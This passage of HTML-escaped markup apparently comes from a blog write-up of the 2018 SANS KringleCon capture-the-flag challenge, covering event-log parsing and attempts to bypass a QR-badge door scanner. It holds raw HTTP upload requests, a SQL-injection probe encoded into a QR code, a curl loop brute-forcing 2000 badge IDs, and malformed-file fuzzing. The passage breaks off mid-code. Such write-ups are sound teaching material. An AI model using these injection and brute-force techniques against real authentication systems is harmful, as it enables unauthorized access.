                &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;evt_data&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;find_all&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;attrs&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;name&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;TargetUserName&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;}):&lt;/span&gt;
                    &lt;span class="n"&gt;user_set_with_no_failure&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;@EM.KRINGLECON.COM&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

    &lt;span class="c1"&gt;# We print our result set&lt;/span&gt;
    &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_set_with_no_failure&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; ./parse_xml.py ./ho-ho-no.xml
&lt;span class="go"&gt;HealthMailboxbe58608&lt;/span&gt;
&lt;span class="go"&gt;HealthMailboxbe58608d4925422d8e4ea458cfedc612&lt;/span&gt;
&lt;span class="go"&gt;SYSTEM&lt;/span&gt;
&lt;span class="go"&gt;WIN-KCON-EXCH16$&lt;/span&gt;
&lt;span class="go"&gt;HealthMailboxbab78a6&lt;/span&gt;
&lt;span class="go"&gt;wunorse.openslae&lt;/span&gt;
&lt;span class="go"&gt;minty.candycane&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Along with some users we don't care about, the script gives us
&lt;code&gt;minty.candycane&lt;/code&gt; and &lt;code&gt;wunorse.openslae&lt;/code&gt;. With some manual analysis
of the XML file, we can determine that the right user is
&lt;code&gt;minty.candycane&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="bypassing-the-door-authentication-mechanism"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id25"&gt;Bypassing the door authentication mechanism&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="the-haxxor-way"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id26"&gt;The &amp;quot;haXXor&amp;quot; way&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;We want to open &lt;a class="reference external" href="https://scanomatic.kringlecastle.com/index.html"&gt;the door next to Pepper Minstix&lt;/a&gt;, but we need a badge to do
so. The door needs to scan a QR code. It can do so by using your webcam (you
then need to click on the fingerprint reader), or you can upload a QR code
image using the USB dongle. Luckily for us, Alabaster Snowball lost his badge,
and we managed to get our hands on it:&lt;/p&gt;
&lt;img alt="alabaster_badge.png" class="align-center" src="/images/sans-christmas-challenge-2018/alabaster_badge.png" /&gt;
&lt;p&gt;If we try to scan this badge, we're told that the user was disabled. Probably
because the badge was lost.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;scanomatic.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json, text/javascript, */*; q=0.01&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://scanomatic.kringlecastle.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------5162445520959346741824970383&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;153774&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;resource_id=false&lt;/span&gt;

-----------------------------5162445520959346741824970383
Content-Disposition: form-data; name=&amp;quot;barcode&amp;quot;; filename=&amp;quot;alabaster_badge.png&amp;quot;
Content-Type: image/png

PNG [snip, content of the PNG file]
-----------------------------5162445520959346741824970383
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 12:57:34 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;70&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;Authorized User Account Has Been Disabled!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="scanomatic_user_disabled.gif" class="align-center" src="/images/sans-christmas-challenge-2018/scanomatic_user_disabled.gif" /&gt;
&lt;p&gt;So, we need to create our own badge. If we scan Alabaster's badge with a QR
code reader, we get &lt;code&gt;oRfjg5uGHmbduj2m&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;And this is where I lost sooooo much time&lt;/strong&gt;. For the purpose of completeness,
let's see all of my dead ends, yay! If you just want the solution, feel free to
&lt;a class="reference external" href="#the-right-solution"&gt;jump directly to it&lt;/a&gt;.&lt;/p&gt;
&lt;div class="section" id="all-the-dead-ends-yay"&gt;
&lt;h5&gt;&lt;a class="toc-backref" href="#id27"&gt;All the dead ends, yay!&lt;/a&gt;&lt;/h5&gt;
&lt;p&gt;The QR-encoded message looks like a base64-encoded string. Let's decode it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; -n oRfjg5uGHmbduj2m &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &lt;span class="p"&gt;|&lt;/span&gt; hexdump -C
&lt;span class="go"&gt;00000000  a1 17 e3 83 9b 86 1e 66  dd ba 3d a6              |.......f..=.|&lt;/span&gt;
&lt;span class="go"&gt;0000000c&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us a 12 byte identifier, &lt;code&gt;0xa117e3839b861e66ddba3da6&lt;/code&gt;. My
first idea was that, since we have to bypass authentication, let's try a SQL
injection in this id. However, I thought that, since the id &lt;strong&gt;seemed to be
base64-encoded&lt;/strong&gt;, I'd have to base64-encode my payload. Let's generate a QR
code with our SQL injection payload. I'm using the &lt;code&gt;qrtools&lt;/code&gt; Python
library:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;qrtools&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;base64&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;qrtools&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;QR&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;foo&amp;quot;&lt;/span&gt;&lt;span class="se"&gt;\&amp;#39;&lt;/span&gt;&lt;span class="s1"&gt;#;-- &amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;sqli_detection.png&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I'm first trying a simple payload, which just tries to break the SQL syntax.&lt;/p&gt;
&lt;p&gt;However, it did not work:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;scanomatic.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json, text/javascript, */*; q=0.01&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://scanomatic.kringlecastle.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------49127043815591531222123518543&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;580&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;resource_id=false&lt;/span&gt;

-----------------------------49127043815591531222123518543
Content-Disposition: form-data; name=&amp;quot;barcode&amp;quot;; filename=&amp;quot;sqli_detection.png&amp;quot;
Content-Type: image/png

PNG [snip]
-----------------------------49127043815591531222123518543
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 13:09:43 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;61&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;No Authorized User Account Found!&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmm, it did not work. Our payload should have broken the SQL syntax. Instead,
we got a message saying that the provided user id does not exists. I then
thought that maybe we had to find a valid, active user id. I decided to try
bruteforcing the id close to Alabaster's id, to find an active, existing user:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;j&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;            &lt;span class="n"&gt;user_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mh"&gt;0xa117e3839b861e66ddba3da6&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;**&lt;/span&gt;&lt;span class="n"&gt;j&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;            &lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;02X&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;hex&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="gp"&gt;... &lt;/span&gt;            &lt;span class="n"&gt;qr&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;id_bruteforce/{}.png&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user_id&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;span class="gp"&gt;...&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bam! 2000 QR codes. Let's use &lt;code&gt;curl&lt;/code&gt; to upload them all:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;cd&lt;/span&gt; id_bruteforce
&lt;span class="gp"&gt;$&lt;/span&gt; ls -1 &lt;span class="p"&gt;|&lt;/span&gt; &lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="nb"&gt;read&lt;/span&gt; f&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="k"&gt;do&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; curl -b &lt;span class="s1"&gt;&amp;#39;resource_id=false&amp;#39;&lt;/span&gt; -F &lt;span class="s2"&gt;&amp;quot;barcode=@&lt;/span&gt;&lt;span class="nv"&gt;$f&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt; https://scanomatic.kringlecastle.com/upload &amp;gt; ./results/&lt;span class="nv"&gt;$f&lt;/span&gt;.txt&lt;span class="p"&gt;&amp;amp;&lt;/span&gt; &lt;span class="k"&gt;done&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I'll spare you the suspense, it did not work. I always got the same message,
&lt;code&gt;No Authorized User Account Found!&lt;/code&gt;. I also noticed that the id seemed
to be case insensitive. For example, Alabaster's id, sent as
&lt;code&gt;oRfjg5uGHmbduj2m&lt;/code&gt; or &lt;code&gt;oRfjg5uGHmbduj2M&lt;/code&gt; gave the same message,
&lt;code&gt;Authorized User Account Has Been Disabled!&lt;/code&gt;. I then tried bruteforcing
the base64 message itself. I mean, a 16 character string, with only lower case
letters and numbers (I decided to ignore symbols) is still 83 bits of entropy,
but I was desperate. Needless to say, it did not work.&lt;/p&gt;
&lt;p&gt;I then decided to attack the webserver directly by sending malformed images:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/upload&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;scanomatic.kringlecastle.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json, text/javascript, */*; q=0.01&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://scanomatic.kringlecastle.com/index.html&lt;/span&gt;
&lt;span class="na"&gt;X-Requested-With&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;XMLHttpRequest&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=---------------------------49127043815591531222123518543&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;219&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;resource_id=false&lt;/span&gt;

-----------------------------49127043815591531222123518543
Content-Disposition: form-data; name=&amp;quot;barcode&amp;quot;; filename=&amp;quot;empty.png&amp;quot;
Content-Type: image/png

-----------------------------49127043815591531222123518543--
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 03 Jan 2019 13:31:50 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/json&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;124&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;

&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;data&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;EXCEPTION AT (LINE 151 \&amp;quot;qr.decode(full_path)\&amp;quot;): cannot identify image file &amp;#39;uploads/empty.png&amp;#39;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nt"&gt;&amp;quot;request&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Finally! An error message with a partial path disclosure. I then thought that
it might be an upload vulnerability with a race condition, that I had to upload
a file and access it via
&lt;a class="reference external" href="https://scanomatic.kringlecastle.com/uploads/my_evil_file"&gt;https://scanomatic.kringlecastle.com/uploads/my_evil_file&lt;/a&gt; before it's deleted,
but this was another dead-end.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="the-right-solution"&gt;
&lt;h5&gt;&lt;a class="toc-backref" href="#id28"&gt;The right solution&lt;/a&gt;&lt;/h5&gt;
&lt;p&gt;I almost gave up and checked the clue given by Pepper Minstix, but I first
decided to try one last thing: send a random string that I would QR-encode:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;string&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;random&lt;/span&gt;
&lt;span class="gp"&gt;&amp;gt;&amp;gt;&amp;gt; &lt;/span&gt;&lt;span class="n"&gt;random_payload&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;choice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;string&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;printable&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;x&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;xrange&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span 